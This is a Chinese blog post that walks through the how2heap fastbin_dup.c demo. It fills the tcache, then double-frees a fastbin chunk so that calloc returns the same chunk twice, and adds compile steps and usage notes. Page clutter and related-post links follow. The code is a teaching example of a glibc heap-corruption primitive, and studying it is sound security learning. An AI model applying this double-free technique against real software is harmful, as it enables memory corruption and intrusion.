how2heap-fastbin_dup.c

已于 2023-05-14 22:28:17 修改
阅读量304 收藏
点赞数
分类专栏: PWN 文章标签: pwn
于 2023-05-13 23:56:47 首次发布
cctrl
本文链接:https://blog.csdn.net/weixin_44309300/article/details/130663860
版权
该代码展示了如何在存在tcache的libc版本中进行fastbin_dup攻击。首先填满tcache,然后执行double-free操作,避免头结点被二次释放,以此来操纵内存分配。通过calloc和free操作,可以导致内存块的重复分配,揭示了内存管理中的安全漏洞。
摘要由CSDN通过智能技术生成

不同libc版本的fastbin_dup.c源码有点小区别:主要是有tcache的,需要先填充
以下为有tcache的源码示例:

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main()
{
	setbuf(stdout, NULL);

	printf("This file demonstrates a simple double-free attack with fastbins.\n");

	printf("Fill up tcache first.\n");
	void *ptrs[8];
	for (int i=0; i<8; i++) {
		ptrs[i] = malloc(8);
	}
	for (int i=0; i<7; i++) {
		free(ptrs[i]);
	}

	printf("Allocating 3 buffers.\n");
	int *a = calloc(1, 8);
	int *b = calloc(1, 8);
	int *c = calloc(1, 8);

	printf("1st calloc(1, 8): %p\n", a);
	printf("2nd calloc(1, 8): %p\n", b);
	printf("3rd calloc(1, 8): %p\n", c);

	printf("Freeing the first one...\n");
	free(a);

	printf("If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
	// free(a);

	printf("So, instead, we'll free %p.\n", b);
	free(b);

	printf("Now, we can free %p again, since it's not the head of the free list.\n", a);
	free(a);

	printf("Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a);
	a = calloc(1, 8);
	b = calloc(1, 8);
	c = calloc(1, 8);
	printf("1st calloc(1, 8): %p\n", a);
	printf("2nd calloc(1, 8): %p\n", b);
	printf("3rd calloc(1, 8): %p\n", c);

	assert(a == c);
}

编译:
gcc -g fastbin_dup.c -o fastbin_dup

tcache[count]特点
count= 7
优先分配-用malloc(8)的大小即可free后占用

在这里插入图片描述7个tcache
在这里插入图片描述fastbin_dup注意事项:
头结点不能同时free两次。
在这里插入图片描述
释放b把头结点变成b,即可再次free(a):
在这里插入图片描述达成利用:
在这里插入图片描述执行结果:
在这里插入图片描述

fastbin_dup总结:

  • 可用libc版本
    所有

  • bins
    fastbin

  • 注意事项
    1.有tcache先malloc(8)*7,在free掉7个占满tcache;
    2.double free的chunk不能是头结点,需要利用一个中间替换头结点;

  • 目的
    重复写free(chunk)

hercu1iz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
api-ms-win-core-heap-l2-1-0.dll(32+64位都有)亲测可用
03-02
《api-ms-win-core-heap-l2-1-0.dll:操作系统核心堆管理库解析》 在Windows操作系统中,`api-ms-win-core-heap-l2-1-0.dll`是一个至关重要的动态链接库文件,它是系统核心堆管理的一部分,用于32位和64位系统。该...
PWN · Heap · how2heap】[fastbin_dup.c]
Mr_Fmnwon的博客
06-21 300
开始学习PWN堆相关的部分时,被繁复的知识冲昏了头脑。了解到how2heap是国外大神的系列堆漏洞小实验,于是尝试通过复现这些漏洞,并提取知识点。
how2heap2.31学习(1)
m0_51251108的博客
09-30 609
how2heap里的libc2.31的fastbin部分
how2heap(1):fastbin_dup 2.31
hollk’s blog
08-25 825
fastbin_dup 2.27 源码 # gcc -g fastbin_dup.c -o fastbin_dup 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <assert.h> 4 5 int main() 6 { 7 setbuf(stdout, NULL); 8 9 printf("This file demonstrates a
how2heap学习笔记(1)
发蝴蝶和大脑斧的博客
12-28 2223
1.first_fit.c 就是堆的先进后出,malloc取最近free的大小大于请求的chunk,不是fastbinfastbin没有最低位显示前一块。 2.fastbin_dup.c #include &amp;amp;amp;amp;amp;amp;lt;stdio.h&amp;amp;amp;amp;amp;amp;gt; #include &amp;amp;amp;amp;amp;amp;lt;stdlib.h&amp;amp;amp;amp;amp;am
linux堆内存漏洞利用之fastbin
pang241的专栏
09-24 1809
背景介绍在前一节主要介绍了Glibc的堆内存管理的机制,在上一节的基础上,我打算介绍一下针对Glibc堆内存管理的攻击。此系列我打算按攻击面是哪一个bin来展开,主要分为: - fastbin的攻击 - smallbin的攻击 - largebin的攻击 - unsorted bin的攻击 - top chunk的攻击本文主要介绍fastbin的攻击fastbin漏洞利
platform-tools_r31.0.2-windows
07-05
平台工具包"platform-tools_r31.0.2-windows"是Android开发不可或缺的一部分,由Google官方发布,主要用于支持Android应用程序的构建、调试和部署。这个版本号表示这是平台工具的第31.0.2次更新,针对Windows操作...
api-ms-win-core-heap-l2-1-0.dll (64位).rar
12-19
2. **api-ms-win-core-heap-l2-1-0.dll详解**: 这个特定的DLL文件属于Windows Core Heap API的一部分,它提供了低级内存管理功能。核心堆API主要负责内存分配、释放、内存块的复制和内存大小调整等任务,对系统的...
api-ms-win-core-heap-l2-1-0.zip
05-28
标题中的"api-ms-win-core-heap-l2-1-0.zip"是一个压缩包文件,它包含了一个名为"api-ms-win-core-heap-l2-1-0.dll"的动态链接库(DLL)文件以及一个"说明.txt"的文本文件。这个压缩包主要是为了解决系统中缺失"api-...
最新版linux elasticsearch-7.8.0-linux-x86_64.tar.gz
06-19
es.jvm.options: "-Xms<heap_size> -Xmx<heap_size>" ``` **启动与管理**: 1. 启动Elasticsearch服务: ``` bin/elasticsearch ``` 2. 如果需要作为后台服务运行,可以使用`nohup`命令: ``` nohup bin/...
3.fastbin_dup_into_stack
06-08 470
源代码 1 #include <stdio.h> 2 #include <stdlib.h> 3 4 int main() 5 { 6 fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n" 7 "r...
pwn学习-how2heap-fastbin_dup
qq_39153247的博客
08-20 1412
今天打完比赛身心疲惫,来复习复习把,写一点简单的把   之所以记录一下fastbin,是因为现阶段我能接触到最多的就是它了。   fastbins: 程序中总是会分配一些比较小的堆块,对于这些堆块来说,如果我们直接将他们合并,那么下次申请的时候还需要重新切割出来,降低了运行的效率,所以ptmalloc设计了fastbins. fastbins共有10个bin,分别是8-80字节,依次增...
2.fastbin_dup
06-08 309
源代码  演示了doublefree 1 #include <stdio.h> 2 #include <stdlib.h> 3 4 int main() 5 { 6 fprintf(stderr, "This file demonstrates a simple double-free attack with fastbin...
堆漏洞 -fastbin_dup
qq_43390703的博客
10-18 416
double free #include <stdio.h> #include <stdlib.h> #include <string.h> int main() { fprintf(stderr, "Allocating 3 buffers.\n"); char *a = malloc(9); char *b = malloc(9); char *c = malloc(9); strcpy(a, "AAAAAAAA"); strcpy(b, "BBBBBBBB"); s
fastbin_dup_into_stack.c 调试记录
a673562566的博客
08-18 186
源码如下 int main() { fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n" "returning a pointer to a controlled location (in this case, the stack).\n"); unsigned long long stack_var; fprintf(stderr, "The addres...
全网最硬核PWN入门_图解分析
个人笔记
04-03 6269
PWN序Linux环境下的基础知识从C源码到可执行文件的生成过程程序的编译与链接什么是可执行文件可执行文件分类PE/ELFELF文件格式区分节和段的存储区域加载ELF / 查看节和段区分布命令段(segment)与节(section)程序数据在内存中的组织分布大端序与小端序存储关键寄存器静态链接与动态链接常用汇编指令intel 和 AT&T汇编格式 序 PWN知识只有不断的重复,实践才能熟悉掌握。以下知识点以LINUX系统环境下为主要说明(Windows的会有点区别)。 Linux环境下的基础知识
buuctf(pwn
个人笔记
04-04 2666
一日一PWN/REpwn1_sctf_2016 实践是检验真理的唯一标准。 pwn1_sctf_2016 1.找到漏洞的利用点往往才是困难点。(直接F5看看反汇编) 发现两个可以函数跟进去看看 2.这里对反汇编出来的Vuln理解了半天(本还想从汇编直接分析,不过进展收获不大,欢迎有兴趣的朋友一起交流),下面还是从伪代码分析。 通过这几行能看出最后A变成了B。即把YOU 换成了I。 因为上面是S的溢出点是3C,可fgets之读取了32并不会超过3C,但函数会把一个32个I换成32个YOU就达到了溢出点。 3.
2021/10/18-如何调试pwn的exp或payload
个人笔记
10-19 1703
《2021年10月18日》 【连续第18天总结】 首先需要明白的是,你调试的exp.py是你输入的内容(即程序获取用户输入的信息)。 通过exp.py脚本与程序交互执行你的输入,跟手动一次次输入并无两样,所以想通过下断点调试查看你希望看到的具体位置数据的方法是一样的。 pwn调试小技巧 pwntool工具中一些好用的模块 context.log_level="debug" //输出显示调试信息,即用户输入与程序交互的信息 context.terminal = ["tmux","splitw","-h"]
CTF 2015: Search Engine-fastbin_dup_into_stack
个人笔记
05-24 757
参考: [1]https://gsgx.me/posts/9447-ctf-2015-search-engine-writeup/ [2]https://blog.csdn.net/weixin_38419913/article/details/103238963(掌握利用点,省略各种逆向细节) [3]https://bbs.kanxue.com/thread-267876.htm(逆向调试详解) [4]https://bbs.kanxue.com/thread-247219.htm(双解法) 1,三连 2
api-ms-win-core-heap-l2-1-0.dll
最新发布
07-17
api-ms-win-core-heap-l2-1-0.dll 是Windows操作系统中的一个动态链接库文件。该文件提供了与堆(heap)有关的核心功能的应用程序编程接口(API)函数。堆是一种内存分配机制,用于动态地分配和管理程序运行时所需的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值